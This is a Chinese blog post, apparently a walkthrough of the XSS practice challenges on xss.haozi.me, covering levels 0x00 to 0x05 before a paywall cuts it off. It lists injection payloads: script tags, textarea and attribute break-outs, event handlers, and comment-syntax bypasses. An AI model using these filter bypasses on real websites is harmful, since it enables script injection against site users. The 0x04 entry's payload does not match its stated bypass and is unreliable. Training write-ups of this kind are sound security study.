本文介绍了XSS Haozi网站(https://xss.haozi.me/)上的XSS练习题,从0x00到0x12,详细解析了每一道题目的解题思路,包括利用反引号、字符编码、html注释、换行符等各种绕过过滤的方法,以及浏览器兼容性和HTML与JS大小写差异等知识点。
xss刷题网站2 https://xss.haozi.me/
一个非常可爱的网站。这是网站界面,题目序号是十六进制,一共19道题。
0x00
直接输入<script>alert(1)</script>
0x01
先闭合textarea框再实现</textarea><script>alert(1)</script>
0x02
在input框中,先引号闭合,再输入onmouseover="alert(1)">
太强了,在input code中输入是实时反馈的,强推这个网站。
0x03
题目过滤了(),利用反引号`绕过
反引号可以替代单双引号
0x04
题目过滤了()`,利用字符编码绕过
<img src="" onerror=javascript:alert(1)>
0x05
html注释有两种格式,
<!-- xxx -->
<!- xxx -!>
这道题过滤了 --> 可以构造-!>
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
